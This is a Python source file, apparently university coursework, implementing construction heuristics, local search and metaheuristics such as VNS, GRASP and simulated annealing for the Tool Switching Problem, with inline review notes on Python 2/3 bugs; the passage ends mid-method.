def singleNeighborSwapNeighborhood(job_sequence):
    """Yield every neighbor of job_sequence obtained by swapping a single
    adjacent pair of jobs."""
    for pos in range(1, len(job_sequence)):
        neighbor = copy.deepcopy(job_sequence)
        neighbor[pos], neighbor[pos - 1] = neighbor[pos - 1], neighbor[pos]
        yield neighbor
def dualNeighborSwapNeighborhood(job_sequence):
    """Yield neighbors at adjacent-swap distance two: every adjacent swap of
    job_sequence, each expanded by every adjacent swap of the result."""
    for pos in range(1, len(job_sequence)):
        once_swapped = copy.deepcopy(job_sequence)
        once_swapped[pos], once_swapped[pos - 1] = once_swapped[pos - 1], once_swapped[pos]
        for twice_swapped in singleNeighborSwapNeighborhood(once_swapped):
            yield twice_swapped
def singlePairSwapNeighborhood(job_sequence):
    """Yield every neighbor reachable by swapping one unordered pair of
    positions (all i < j combinations)."""
    size = len(job_sequence)
    for first in range(size):
        for second in range(first + 1, size):
            neighbor = copy.deepcopy(job_sequence)
            neighbor[first], neighbor[second] = neighbor[second], neighbor[first]
            yield neighbor
def singleSliceSwapNeighborhood(job_sequence, k=None):
    """Yield neighbors created by swapping two disjoint length-k slices.

    Args:
        job_sequence: current job permutation (list).
        k: slice length; defaults to len(job_sequence)//10, falling back to
           min(3, len(job_sequence)) when that is zero.

    BUGFIX: the original used '/' which is float division on Python 3,
    breaking range() and slicing; '//' keeps the Python 2 semantics.
    """
    if k is None:
        k = len(job_sequence) // 10
    if k == 0:
        k = min(3, len(job_sequence))
    if k == 0:
        # Empty job sequence: no neighbors (avoids division by zero below).
        return
    num_slices = len(job_sequence) // k
    for i in range(num_slices):
        for j in range(i + 1, num_slices):
            new_sequence = copy.deepcopy(job_sequence)
            new_sequence[i*k:i*k+k], new_sequence[j*k:j*k+k] = \
                new_sequence[j*k:j*k+k], new_sequence[i*k:i*k+k]
            yield new_sequence
def singleSliceRandomizeNeighborhood(job_sequence, k=None):
    """Yield one neighbor per length-k slice, with that slice randomly permuted.

    Args:
        job_sequence: current job permutation (list).
        k: slice length; defaults to len(job_sequence)//10, falling back to
           min(3, len(job_sequence)) when that is zero.

    BUGFIX: the original used '/' which is float division on Python 3,
    breaking range(); '//' keeps the Python 2 semantics.
    """
    if k is None:
        k = len(job_sequence) // 10
    if k == 0:
        k = min(3, len(job_sequence))
    if k == 0:
        # Empty job sequence: nothing to randomize (avoids ZeroDivisionError).
        return
    for i in range(len(job_sequence) // k):
        new_sequence = copy.deepcopy(job_sequence)
        new_slice = []
        old_slice = copy.deepcopy(new_sequence[i*k:i*k+k])
        # Draw without replacement to build a random permutation of the slice.
        while len(old_slice):
            choice = random.choice(old_slice)
            new_slice.append(choice)
            old_slice.remove(choice)
        new_sequence[i*k:i*k+k] = new_slice
        yield new_sequence
def rotatingNeighborhood(job_sequence):
    """Yield every rotation of job_sequence; the final yield equals the input."""
    rotated = collections.deque(job_sequence)
    for _ in range(len(job_sequence)):
        rotated.rotate(1)
        yield list(rotated)
def recursiveRandomSwapNeighborhood(job_sequence, resolution=1, depth=3):
    """Yield random-swap neighbors, recursing on each neighbor down `depth` levels.

    BUGFIX: `resolution` was accepted and threaded through the recursion but
    never actually passed to singleRandomSwapNeighborhood; it is now forwarded.
    """
    for new_sequence in singleRandomSwapNeighborhood(job_sequence, resolution):
        yield new_sequence
        if depth:
            for deeper_sequence in recursiveRandomSwapNeighborhood(new_sequence, resolution, depth - 1):
                yield deeper_sequence
def multiRandomSwapNeighborhood(job_sequence, resolution=100, multi_resolution=0.1):
    """Yield len(job_sequence)*resolution neighbors, each produced by applying
    int(len(job_sequence)*multi_resolution) random pair swaps to a fresh copy."""
    size = len(job_sequence)
    swaps_per_neighbor = int(size * multi_resolution)
    for _ in range(size * resolution):
        neighbor = copy.deepcopy(job_sequence)
        for _ in range(swaps_per_neighbor):
            a = b = 0
            # Re-draw until the two swap positions differ.
            while a == b:
                a = random.randrange(0, size)
                b = random.randrange(0, size)
            neighbor[a], neighbor[b] = neighbor[b], neighbor[a]
        yield neighbor
def multiRandomNeighborSwapNeighborhood(job_sequence, resolution, depth):
    """Yield len(job_sequence)*resolution neighbors, each produced by applying
    `depth` random adjacent swaps to a fresh copy of the sequence."""
    for _ in range(len(job_sequence) * resolution):
        neighbor = copy.deepcopy(job_sequence)
        for _ in range(depth):
            pos = random.randrange(1, len(job_sequence))
            neighbor[pos], neighbor[pos - 1] = neighbor[pos - 1], neighbor[pos]
        yield neighbor
def combinedNeighborhood(job_sequence, neighborhood_generator_function_a, neighborhood_generator_function_b):
    """Randomly sample the composition of two neighborhoods.

    Roughly 10% of the sequences produced by neighborhood A are expanded via
    neighborhood B, and roughly 10% of those results are yielded.  One uniform
    draw is made per candidate at each level.
    """
    for sequence_a in neighborhood_generator_function_a(job_sequence):
        if random.uniform(0, 1) > 0.1:
            continue  # skip ~90% of A's neighbors
        for sequence_b in neighborhood_generator_function_b(sequence_a):
            # Keep ~10% of B's expansions of the surviving candidates.
            if random.uniform(0, 1) <= 0.1:
                yield sequence_b
########################################################################################################################
#
# Class for loading and solving ToSP problems with various (meta)heuristics
#
########################################################################################################################
class HeuristicSolver:
    """Heuristic Solver for the Tool Switching Problem
    Exercises for WS15 Computational Techniques
    Group members (alphabetical): Morariu, Smolka, Zeba

    Usage: load problem data with loadFromFile(), set the machine capacity
    with setC(), then build a job sequence with one of the construct* methods
    and improve it with the local-search / metaheuristic methods.  A job
    sequence is a plain list of job indices 0..n-1; the objective value is
    the tool-switch count returned by minimizeSwitchesForJobSequence().

    NOTE(review): several methods use '/' on ints (flagged inline), which is
    floor division only under Python 2; under Python 3 it yields floats and
    breaks range()/slicing — confirm the target interpreter.
    """
    def __init__(self):
        self.n = 0 #Jobs
        self.m = 0 #Tools
        self.A = None #n x m Incidence Matrix
        self.C = None #Machine capacity
        self.log = None #log file handle, opened by setLogFile()
        self.console_output = True #echo every log line to stdout as well
        #Counters maintained by the on*() callbacks and printed by writeReport().
        self.stats = {"total_objective_evaluations":0,
                      "total_improvements":0,
                      "total_iterations":0,
                      "total_neighborhoods":0,
                      "objective_evaluations_since_last_improvement":0,
                      "best_objective_value": -1,
                      "improvements_by_neighborhood": {} }
    def setC(self,c):
        """Set machine (tool) capacity"""
        self.C=c
    def getToolsForJob(self,j):
        """Returns the set of tools job j requires."""
        #TODO: Maybe precompute
        return set([i for i in range(self.m) if self.A[j][i] == 1])
########################################################################################################################
#
# Tool Sequence Optimization - Evaluation of Objective Function
#
########################################################################################################################
    def minimizeSwitchesForJobSequence(self,job_sequence,abort_after_max=None):
        """For the given job sequence, return a sequence of tool configurations that tries to
        minimize the number of total tool switches.
        (Exercise 1)
        Adaption: Incremental switch count evaluation: Option to abort after exceeding a certain switch count
        Algorithm:
        1. Initialize the first tool configuration with the tools needed by the first job
        2. Until the first configuration is full:
            Add a tool that is not yet in the configuration, and will be needed the soonest
        3. For each job in the sequence, after the first:
            Find the tools that need to be swapped in (set difference of new needed tools minus current configuration)
            Sort the tools the can be swapped out by for how long they will not be needed
            While there are tools that need to be swapped in:
                Switch out the next longest not needed tool
                Switch in the next needed tool
                Increment switch count

        Returns (tool_sequence, switches).  When abort_after_max is given and
        the running switch count reaches it, returns (False, switches) instead,
        so callers can cheaply discard non-improving candidates.
        """
        self.onEvaluateObjectiveFunction()
        #TODO: More efficient implementation just for evaluating objective function
        i=1
        def rankTool(t): #Assigns a score to a tool based on the time until it will be needed again
            #NOTE: intentionally closes over the loop variable i below, so the
            #ranking is always relative to the job position being processed.
            for k in range(i+1,len(job_sequence)):
                if t in self.getToolsForJob(job_sequence[k]):
                    return (k-(i+1))
            return len(job_sequence)  #never needed again: worst (largest) rank
        switches=0
        #Fill up empty slots of tool_sequence[0] with tools by ranking them by how soon they will be needed
        first_tools=self.getToolsForJob(job_sequence[0])
        additional_tools=sorted([tool for tool in range(self.m) if not tool in first_tools],key=rankTool)
        additional_tools_index=0
        while len(first_tools) < self.C and additional_tools_index < len(additional_tools):
            first_tools.add(additional_tools[additional_tools_index])
            additional_tools_index+=1
        tool_sequence=[first_tools]
        #We know which tools we must swap in after every job, so we search for the optimal tools to swap out.
        for i in range(1,len(job_sequence)):
            current_tools=tool_sequence[i-1]
            needed_tools=self.getToolsForJob(job_sequence[i])
            switch_in_tools=needed_tools.difference(current_tools)
            next_tools=copy.deepcopy(current_tools)
            #Candidates for eviction: currently loaded tools not needed now,
            #farthest-future-use first (classic Belady-style eviction order).
            switch_candidates = sorted([tool for tool in current_tools if not tool in needed_tools],key=rankTool,reverse=True)
            switch_candidate_index = 0
            for needed in switch_in_tools:
                if len(next_tools) >= self.C:
                    if switch_candidate_index < len(switch_candidates):
                        next_tools.remove(switch_candidates[switch_candidate_index])
                        switch_candidate_index += 1
                    else:
                        raise ValueError("Machine capacity too small for job")
                next_tools.add(needed)
                switches += 1
                #Incremental evaluation: bail out early once the bound is hit.
                if abort_after_max != None and switches >= abort_after_max:
                    return False,switches
            tool_sequence.append(next_tools)
        return (tool_sequence,switches)
########################################################################################################################
#
# Construction Heuristics
#
########################################################################################################################
    def constructJobSequenceLinear(self):
        """Trivial construction: jobs in natural order 0..n-1."""
        return [i for i in range(self.n)]
    def constructJobSequenceRandom(self):
        """Construction: a uniformly random permutation of all jobs."""
        jobs=[i for i in range(self.n)]
        job_sequence=[]
        while len(jobs):
            j=random.choice(jobs)
            job_sequence.append(j)
            jobs.remove(j)
        return job_sequence
    def constructJobSequenceGreedy(self):
        """Construct a job sequence minimizing tool switches using a greedy algorithm.
        (Exercise 2)
        Algorithm:
        1. Find pair of jobs with the largest common needed tool denominator
        2. Add pair to the job sequence
        2. For each remaining job:
            Find the remaining job with the largest common needed tool denominator with the last job added to the job sequence
            Add the chosen job to the sequence
        """
        jobs=set([i for i in range(self.n)])
        job_sequence=[]
        best_pair=None
        best_pair_intersect=-1
        #Seed the sequence with the pair sharing the most tools.
        for j in jobs:
            for l in jobs:
                if j!=l:
                    tools_j=self.getToolsForJob(j)
                    tools_l=self.getToolsForJob(l)
                    intersect=len(tools_j.intersection(tools_l))
                    if intersect > best_pair_intersect:
                        best_pair_intersect=intersect
                        #Load the job needing more tools first (first loading is free)
                        if len(tools_j)>len(tools_l):
                            best_pair=(j,l)
                        else:
                            best_pair=(l,j)
        best_pair_a,best_pair_b=best_pair
        jobs.remove(best_pair_a)
        jobs.remove(best_pair_b)
        job_sequence=[best_pair_a,best_pair_b]
        #Greedily append the job overlapping most with the last one added.
        while len(jobs):
            last_job=job_sequence[-1]
            last_tools=self.getToolsForJob(last_job)
            best=None
            best_intersect=-1
            for j in jobs:
                tools_j=self.getToolsForJob(j)
                intersect=len(last_tools.intersection(tools_j))
                if intersect > best_intersect:
                    best=j
                    best_intersect=intersect
            job_sequence.append(best)
            jobs.remove(best)
        return job_sequence
    def constructJobSequencesGreedyJobClustering(self):
        """Construct a number of job sequences minimizing tool switches using an advanced greedy algorithm.
        (Exercise 2)
        Algorithm:
        1. Group jobs into clusters based on intersection count
        2. Greedily order jobs within clusters to maximize neighbor intersects
        3. Permutate clusters to create job sequence variants

        Returns a list of job sequences (one per cluster permutation).
        """
        jobs=set([i for i in range(self.n)])
        clusters = [set() for i in range(self.n)]
        mates = [0 for i in range(self.n)]
        #Each job's "mate" is the job it shares the most tools with.
        #NOTE(review): if a job shares no tools with any other, its mate stays
        #None and None is later inserted into a cluster — confirm inputs
        #guarantee some overlap between jobs.
        for j in jobs:
            best_mate = None
            best_mate_intersect = 0
            for l in jobs:
                if j!=l:
                    tools_j=self.getToolsForJob(j)
                    tools_l=self.getToolsForJob(l)
                    intersect=len(tools_j.intersection(tools_l))
                    if intersect > best_mate_intersect:
                        best_mate_intersect=intersect
                        best_mate=l
            mates[j]=best_mate
        #Transitively close the mate relation into clusters (fixpoint loop).
        added=True
        while added:
            added=False
            for job,mate in enumerate(mates):
                if not mate in clusters[job]:
                    clusters[job].add(mate)
                    added=True
                for k,cluster in enumerate(clusters):
                    if mate in cluster:
                        if not job in cluster:
                            cluster.add(job)
                            added=True
        #Merge overlapping clusters into disjoint superclusters.
        superclusters=[]
        for cluster in clusters:
            intersected=False
            for supercluster in superclusters:
                if len(supercluster.intersection(cluster))!=0:
                    intersected=True
                    for item in cluster:
                        supercluster.add(item)
            if not intersected:
                superclusters.append(cluster)
        #Sanity check: superclusters must be pairwise disjoint.
        #NOTE(review): bare `raise` with no active exception produces a
        #RuntimeError("No active exception to re-raise") under Python 3.
        for i in range(len(superclusters)):
            for j in range(len(superclusters)):
                if i!=j and len(superclusters[i].intersection(superclusters[j])):
                    raise
        #Order each supercluster greedily, exactly like constructJobSequenceGreedy.
        ordered_superclusters = []
        for cluster in superclusters:
            ordered_cluster=[]
            best_pair=None
            best_pair_intersect=-1
            for j in cluster:
                for l in cluster:
                    if j!=l:
                        tools_j=self.getToolsForJob(j)
                        tools_l=self.getToolsForJob(l)
                        intersect=len(tools_j.intersection(tools_l))
                        if intersect > best_pair_intersect:
                            best_pair_intersect=intersect
                            #Load the job needing more tools first (first loading is free)
                            if len(tools_j)>len(tools_l):
                                best_pair=(j,l)
                            else:
                                best_pair=(l,j)
            best_pair_a, best_pair_b = best_pair
            ordered_cluster.append(best_pair_a)
            ordered_cluster.append(best_pair_b)
            cluster.remove(best_pair_a)
            cluster.remove(best_pair_b)
            while(len(cluster)):
                last_job=ordered_cluster[-1]
                last_tools=self.getToolsForJob(last_job)
                best=None
                best_intersect=-1
                for j in cluster:
                    tools_j=self.getToolsForJob(j)
                    intersect=len(last_tools.intersection(tools_j))
                    if intersect > best_intersect:
                        best=j
                        best_intersect=intersect
                ordered_cluster.append(best)
                cluster.remove(best)
            ordered_superclusters.append(ordered_cluster)
        #One candidate sequence per permutation of the ordered clusters.
        #NOTE(review): factorial blow-up in the number of superclusters.
        job_sequences=[]
        for permutation in itertools.permutations(ordered_superclusters):
            job_sequence=[]
            for cluster in permutation:
                for item in cluster:
                    job_sequence.append(item)
            job_sequences.append(job_sequence)
        return job_sequences
    def constructJobSequenceGreedyRandomized(self, alpha=None):
        """Construct a job sequence mimizing tool switches using a randomized greedy algorithm.
        (Exercise 6.a)
        Algorithm:
        1. For each remaining job:
            CL=Remaining jobs
            RCL=Remaining jobs with promising intersection
            Add a random job from RCL to the job sequence

        :param alpha: RCL greediness in [0,1]; 0 = purely greedy, 1 = purely
                      random.  Drawn uniformly at random when omitted.
        """
        if alpha==None:
            alpha=random.uniform(0,1)
        jobs=set([i for i in range(self.n)])
        job_sequence=[]
        while len(jobs):
            #First pass: find the intersection range over all remaining jobs.
            max_intersect=0
            min_intersect=100000
            for j in jobs:
                tools_j=self.getToolsForJob(j)
                if len(job_sequence):
                    intersect=len(self.getToolsForJob(job_sequence[-1]).intersection(tools_j))
                else:
                    intersect=len(tools_j)  #first job: rank by tool count
                max_intersect=max(max_intersect,intersect)
                min_intersect=min(min_intersect,intersect)
            #Second pass: restricted candidate list by the GRASP threshold.
            RCL=[]
            for j in jobs:
                tools_j=self.getToolsForJob(j)
                if len(job_sequence):
                    intersect=len(self.getToolsForJob(job_sequence[-1]).intersection(tools_j))
                else:
                    intersect=len(tools_j)
                if intersect >= max_intersect - alpha * (max_intersect-min_intersect):
                    RCL.append(j)
            chosen=random.choice(RCL)
            job_sequence.append(chosen)
            jobs.remove(chosen)
        return job_sequence
########################################################################################################################
#
# Local Search
#
########################################################################################################################
    def nextBestJobSequence(self,job_sequence,neighborhood_generator,first_improvement=True):
        """Try to improve the job sequence by evaluating the given neighborhood
        (Exercise 3)

        :param neighborhood_generator: an already-instantiated generator of
                                       candidate sequences
        :param first_improvement: stop at the first improving candidate
                                  (True) or scan the whole neighborhood (False)
        Returns (best_sequence, best_switches, improved).
        """
        best_job_sequence = job_sequence
        _, min_switches = self.minimizeSwitchesForJobSequence(best_job_sequence)
        improved=False
        for sequence in neighborhood_generator:
            #Incremental evaluation aborts if switch count is higher/equal than current minimum
            _, new_min_switches = self.minimizeSwitchesForJobSequence(sequence, min_switches)
            if new_min_switches < min_switches:
                best_job_sequence=sequence
                min_switches=new_min_switches
                improved=True
                #Per-neighborhood improvement statistics.
                #NOTE(review): relies on generator objects exposing __name__
                #(set from the generator function on Python 3) — confirm.
                if not neighborhood_generator.__name__ in self.stats["improvements_by_neighborhood"]:
                    self.stats["improvements_by_neighborhood"][neighborhood_generator.__name__]=0
                self.stats["improvements_by_neighborhood"][neighborhood_generator.__name__]+=1
                if first_improvement:
                    break
        return best_job_sequence,min_switches,improved
    def bestJobSequenceLocalSearch(self,job_sequence,neighborhood_generator_function):
        """Perform local search iterations on the job sequence until no more improvement can be made in switch count
        (Exercise 3)

        Returns (job_sequence, min_switches).
        """
        improved = True
        while improved:
            self.onEvaluateNeighborhood()
            neighborhood=neighborhood_generator_function(job_sequence)
            job_sequence,min_switches,improved=self.nextBestJobSequence(job_sequence,neighborhood)
            self.onNewBest(min_switches)
            #print(min_switches)
        return job_sequence,min_switches
########################################################################################################################
#
# Advanced Heuristics
#
########################################################################################################################
    def bestJobSequenceVariableNeighborhoodSearch(self,job_sequence,neighborhood_generator_function_cycle, combine_step=False):
        """Perform local search iterations on the job sequence, by searching in a cycle of neighborhoods, until no more improvement can be made in switch count
        (Exercise 5)

        :param neighborhood_generator_function_cycle: list of neighborhood
               generator functions, tried in order; restart from the first on
               any improvement
        :param combine_step: after convergence, additionally try pairwise
               compositions of the neighborhoods via combinedNeighborhood()
        Returns (job_sequence, min_switches).
        """
        improved = True
        while improved:
            #print("")
            self.onIterate()
            for i in range(len(neighborhood_generator_function_cycle)):
                self.onEvaluateNeighborhood()
                neighborhood_generator_function=neighborhood_generator_function_cycle[i]
                #print(" "*i + neighborhood_generator_function.__name__ )
                neighborhood=neighborhood_generator_function(job_sequence)
                job_sequence,min_switches,improved=self.nextBestJobSequence(job_sequence,neighborhood)
                if improved:
                    #print(" " *i + "New minimum: %d @ %d evals"%(min_switches,self.stats["total_objective_evaluations"]))
                    self.onNewBest(min_switches)
                    break
                else:
                    #Swap the neighborhood to the end of the cycle, because it may not perform well in the current function area
                    pass
        if combine_step:
            improved = True
            while improved:
                #print("")
                self.onIterate()
                for i in range(len(neighborhood_generator_function_cycle)):
                    self.onEvaluateNeighborhood()
                    for j in range(len(neighborhood_generator_function_cycle)):
                        if i==j:
                            continue
                        neighborhood=combinedNeighborhood(job_sequence,neighborhood_generator_function_cycle[i],neighborhood_generator_function_cycle[j])
                        job_sequence,min_switches,improved=self.nextBestJobSequence(job_sequence,neighborhood)
                        if improved:
                            self.onNewBest(min_switches)
                            break
                        else:
                            pass
                    if improved:
                        break
        return job_sequence,min_switches
    def bestJobSequenceGRASP(self,iterations=100):
        """Randomized greedy neighborhood search
        (Exercise 6.a)

        Each iteration builds a randomized-greedy start and polishes it with
        VNS; the best sequence over all iterations is returned.
        """
        cycle=[singleNeighborSwapNeighborhood,singleRandomSwapNeighborhood]
        best_job_sequence = self.constructJobSequenceGreedyRandomized()
        _,best_switches=self.minimizeSwitchesForJobSequence(best_job_sequence)
        best_job_sequence, best_switches = self.bestJobSequenceVariableNeighborhoodSearch(best_job_sequence, cycle)
        for i in range(iterations):
            self.onIterate()
            job_sequence = self.constructJobSequenceGreedyRandomized()
            _,switches=self.minimizeSwitchesForJobSequence(job_sequence)
            job_sequence, switches = self.bestJobSequenceVariableNeighborhoodSearch(job_sequence, cycle)
            if switches < best_switches:
                best_job_sequence=job_sequence
                best_switches=switches
                self.onNewBest(best_switches)
        return best_job_sequence
    def bestJobSequenceGVNS(self,job_sequence,shaker_neighborhood_function,local_neighborhood_cycle,iterations=3,k_max=100):
        """Generalized variable neighborhood search
        (Exercise 6.b)

        :param shaker_neighborhood_function: callable (sequence, resolution, k)
               producing a shaking neighborhood of strength k
        :param k_max: maximum shaking strength before giving up an iteration
        """
        best_job_sequence=job_sequence
        _,best_switches=self.minimizeSwitchesForJobSequence(best_job_sequence)
        for i in range(iterations):
            self.onIterate()
            k=0
            #print("")
            #print("Iteration %d"%i)
            while k < k_max:
                self.onEvaluateNeighborhood()
                #Take the first sequence from the shaking neighborhood.
                #NOTE(review): shake_sequence is never used afterwards — the
                #local search below restarts from job_sequence, so the shaking
                #step is effectively a no-op.  Verify intent.
                shaker_neighborhood=shaker_neighborhood_function(job_sequence,1,k)
                for shake_sequence in shaker_neighborhood:
                    break
                job_sequence,switches=self.bestJobSequenceVariableNeighborhoodSearch(job_sequence,local_neighborhood_cycle)
                if switches<best_switches:
                    #print("New best %d, k=%d"%(switches,k))
                    self.onNewBest(switches)
                    best_job_sequence=job_sequence
                    best_switches=switches
                    k=1
                else:
                    k+=1
                    #print("No new best k=%d"%k)
        return best_job_sequence
    def bestJobSequenceSimulatedAnnealing(self,job_sequence,neighborhood_generator_function,iterations=1000,start_T=1.0):
        """Simulated Annealing
        (Exercise 6.c)

        Linear cooling from start_T to 0 over `iterations`; total objective
        evaluations are additionally capped at iterations*25.
        """
        def acceptance_probability(x,y,T):
            #Metropolis criterion: always accept improvements; accept
            #worsenings with probability exp(-(y-x)/T).
            if T==0:
                return y<x
            return 1 if y<x else math.exp(-float(y-x)/T)
        max_evaluations=iterations*25
        evaluations=0
        _, x = self.minimizeSwitchesForJobSequence(job_sequence)
        best_sequence = job_sequence
        best_switches = x
        for k in range(iterations):
            self.onIterate()
            self.onEvaluateNeighborhood()
            neighborhood=neighborhood_generator_function(job_sequence)
            for new_job_sequence in neighborhood:
                evaluations+=1
                if evaluations>max_evaluations:
                    break
                _, y = self.minimizeSwitchesForJobSequence(new_job_sequence)
                T=start_T - start_T * (float(k)/float(iterations))
                if acceptance_probability(x,y,T) >= random.uniform(0,1):
                    job_sequence=new_job_sequence
                    #print(y,y<x,T,self.stats["total_objective_evaluations"])
                    x=y
                    if x < best_switches:
                        self.onNewBest(x)
                        best_switches=x
                        best_sequence = job_sequence
                    break
            if evaluations>max_evaluations:
                break
        return best_sequence
########################################################################################################################
#
# Experimental Heuristics
#
########################################################################################################################
    def bestJobSequenceGreedyClusteringAllVNS(self,cycle):
        """Run VNS on every greedy-clustering start sequence; return the best."""
        sequences=self.constructJobSequencesGreedyJobClustering()
        best_job_sequence = sequences[0]
        _,best_switches=self.minimizeSwitchesForJobSequence(best_job_sequence)
        best_job_sequence, best_switches = self.bestJobSequenceVariableNeighborhoodSearch(best_job_sequence, cycle)
        for job_sequence in sequences:
            self.onIterate()
            _,switches=self.minimizeSwitchesForJobSequence(job_sequence)
            job_sequence, switches = self.bestJobSequenceVariableNeighborhoodSearch(job_sequence, cycle)
            if switches < best_switches:
                best_job_sequence=job_sequence
                best_switches=switches
                self.onNewBest(best_switches)
        return best_job_sequence
    def bestJobSequenceLocalDecreasingSlices(self,job_sequence,iterations=100):
        """ Experimental!
        (Exercise 3)

        Slice-swap local search with shrinking slice sizes, remembering the
        last improving size between iterations.
        """
        #NOTE(review): '/' here is floor division only under Python 2; under
        #Python 3 this produces a float slice size — confirm interpreter.
        last_improved_size=len(job_sequence)/2
        for i in range(iterations):
            self.onIterate()
            while True:
                slice_size=last_improved_size
                improved = False
                depth=0
                while not improved and slice_size >= 1:
                    self.onEvaluateNeighborhood()
                    neighborhood=singleSliceSwapNeighborhood(job_sequence,slice_size)
                    job_sequence,min_switches,improved=self.nextBestJobSequence(job_sequence,neighborhood)
                    slice_size -= 1
                if not improved:
                    slice_size=len(job_sequence)/2
                    break
                else:
                    last_improved_size=slice_size
                    self.onNewBest(min_switches)
        return job_sequence,min_switches
    def bestJobSequenceMultipleSimulatedAnnealing(self,neighborhood_generator_function,total_iterations=1000):
        """Tournament of simulated-annealing runs over a pool of start
        solutions: anneal every pool member, keep the better half, repeat
        until one solution remains, then give it the remaining budget.
        """
        solutions=[]
        solutions.append(self.constructJobSequenceGreedy())
        solutions.extend(self.constructJobSequencesGreedyJobClustering())
        for i in range(5):
            solutions.append(self.constructJobSequenceGreedyRandomized())
        for i in range(10):
            solutions.append(self.constructJobSequenceRandom())
        best_solution=solutions[0]
        _, best_switches = self.minimizeSwitchesForJobSequence(best_solution)
        while len(solutions) > 1:
            #NOTE(review): integer budget split only under Python 2 ('/').
            iterations = total_iterations / len(solutions)
            #print("%d solutions in pool."%len(solutions))
            #print("%d iterations allocated for each."%iterations)
            for i, sequence in enumerate(solutions):
                #print("\tOptimizing %d of %d"%(i,len(solutions)))
                solutions[i] = self.bestJobSequenceSimulatedAnnealing(sequence,neighborhood_generator_function,iterations)
            def rateSolution(k):
                _, switches = self.minimizeSwitchesForJobSequence(k)
                return switches
            #Keep the better (lower-switch-count) half of the pool.
            solutions=sorted(solutions,key=rateSolution,reverse=False)
            new_solutions=[]
            for i in range(int((0.5+len(solutions))/2)):
                new_solutions.append(solutions[i])
            #print("OLD",[rateSolution(i) for i in solutions])
            #print("NEW",[rateSolution(i) for i in new_solutions])
            solutions=new_solutions
        iterations = total_iterations / len(solutions)
        #NOTE(review): 'sequence' below is the leftover loop variable from the
        #enumerate() loop above; 'solutions[0]' was probably intended here.
        solutions[0] = self.bestJobSequenceSimulatedAnnealing(sequence,neighborhood_generator_function,iterations)
        return solutions[0]
    def bestJobSequenceVariableNeighborhoodSimulatedAnnealing(self,job_sequence,neighborhood_generator_function_cycle, iterations=1000):
        """VNS-style cycling over neighborhoods where each descent step is a
        full simulated-annealing run instead of a plain local search.
        """
        def sanneal(seq,neigh,iters):
            #Adapter: run SA and report (sequence, switches, improved) in the
            #same shape nextBestJobSequence() uses.
            _,old_min_switches=self.minimizeSwitchesForJobSequence(seq)
            new_seq = self.bestJobSequenceSimulatedAnnealing(seq,neigh,iters)
            _,new_min_switches=self.minimizeSwitchesForJobSequence(new_seq)
            return new_seq,new_min_switches,(new_min_switches<old_min_switches)
        improved = True
        while improved:
            #print("")
            self.onIterate()
            for i in range(len(neighborhood_generator_function_cycle)):
                self.onEvaluateNeighborhood()
                neighborhood_generator_function=neighborhood_generator_function_cycle[i]
                #print(" "*i + neighborhood_generator_function.__name__ )
                neighborhood=neighborhood_generator_function(job_sequence)
                job_sequence,min_switches,improved=sanneal(job_sequence,neighborhood_generator_function,iterations)
                if improved:
                    #print(" " *i + "New minimum: %d @ %d evals"%(min_switches,self.stats["total_objective_evaluations"]))
                    self.onNewBest(min_switches)
                    break
                else:
                    #Swap the neighborhood to the end of the cycle, because it may not perform well in the current function area
                    pass
        return job_sequence,min_switches
########################################################################################################################
#
# Utility, Output, Statistics and Debugging
#
########################################################################################################################
    def loadFromFile(self,filename): #TODO: File format sanity checks.
        """Expects data format according to http://www.unet.edu.ve/~jedgar/ToSP/ToSP.htm

        Sets self.n (jobs), self.m (tools) and the incidence matrix self.A.
        NOTE(review): the file handle is never closed; consider a with-block.
        """
        lines=open(filename,"r").readlines()
        self.n=len(lines)
        self.m=-1
        jobs={}
        for line in lines:
            parts=line.replace("#","").split(":")
            j=int(parts[0]) #Extract job index
            jobs[j]=set([int(i) for i in parts[1].split(",")]) #Extract tools
            self.m=max(self.m,max(jobs[j])+1) #Update problem tool count
        #Construct the incidence matrix.
        self.A=[[1 if t in jobs[j] else 0 for t in range(self.m)] for j in range(self.n)]
    def setLogFile(self,filename):
        """Open a CSV log file and write its header row."""
        self.log = open(filename,"w")
        self.writeLog("iteration,objective_value")
    def closeLogFile(self):
        """Close the log file opened by setLogFile()."""
        self.log.close()
    def writeLog(self,msg):
        """Append msg to the log file (if open) and echo to stdout (if enabled)."""
        if self.log != None:
            self.log.write(msg+"\n")
        if self.console_output:
            print(msg)
    def onEvaluateObjectiveFunction(self):
        """Statistics hook: called once per objective-function evaluation."""
        self.stats["total_objective_evaluations"]+=1
        self.stats["objective_evaluations_since_last_improvement"]+=1
    def onEvaluateNeighborhood(self):
        """Statistics hook: called once per neighborhood evaluated."""
        self.stats["total_neighborhoods"]+=1
    def onIterate(self):
        """Statistics hook: called once per (meta)heuristic iteration."""
        self.stats["total_iterations"]+=1
    def onNewBest(self,objective_value):
        """Statistics hook: record a new candidate best objective value.

        Only counts/logs when objective_value actually beats the stored best
        (-1 means "no best yet")."""
        if objective_value < self.stats["best_objective_value"] or self.stats["best_objective_value"]==-1:
            self.stats["total_improvements"]+=1
            self.stats["objective_evaluations_since_last_improvement"]=0
            self.stats["best_objective_value"]=objective_value
            self.writeLog("%d,%d"%(self.stats["total_iterations"],objective_value))
    def writeReport(self,best_job_sequence):
        """Verify the solution, then log the tool sequence, job sequence and
        the collected statistics."""
        tool_sequence, min_switches = self.minimizeSwitchesForJobSequence(best_job_sequence)
        self.writeLog("=======================================================================================================")
        self.debugVerifySolution(best_job_sequence,tool_sequence)
        self.writeLog("Solution passed logic verification.")
        self.writeLog("")
        self.writeLog("Tool sequence:")
        st=0
        for i,tool_set in enumerate(tool_sequence):
            #Switches for step i = tools present now that were not present before.
            swaps=0
            if i>=1:
                swaps=len(tool_set)-len(tool_set.intersection(tool_sequence[i-1]))
            st+=swaps
            self.writeLog("(%2d switches) [%s]" % (swaps,",".join(["%2d"%i for i in sorted([i for i in tool_set])]),))
        self.writeLog("")
        self.writeLog("Job sequence:\n[%s]" % ",".join([str(i) for i in best_job_sequence]))
        self.writeLog("=======================================================================================================")
        self.writeLog("Objective value: %d"%min_switches)
        self.writeLog("Total objective evaluations: %d"%(self.stats["total_objective_evaluations"]-1))
        self.writeLog("Wasted objective evaluations: %d"%(self.stats["objective_evaluations_since_last_improvement"]-1))
        self.writeLog("Total iterations: %d"%self.stats["total_iterations"])
        self.writeLog("Total neighborhoods: %d"%self.stats["total_neighborhoods"])
        self.writeLog("Total improvements: %d"%self.stats["total_improvements"])
    def debugBestSequenceExhaustive(self):
        """Brute force: evaluate every permutation of the jobs (factorial cost);
        only usable for very small instances."""
        start=self.constructJobSequenceLinear()
        best_sequence=start
        _,best_switches=self.minimizeSwitchesForJobSequence(start)
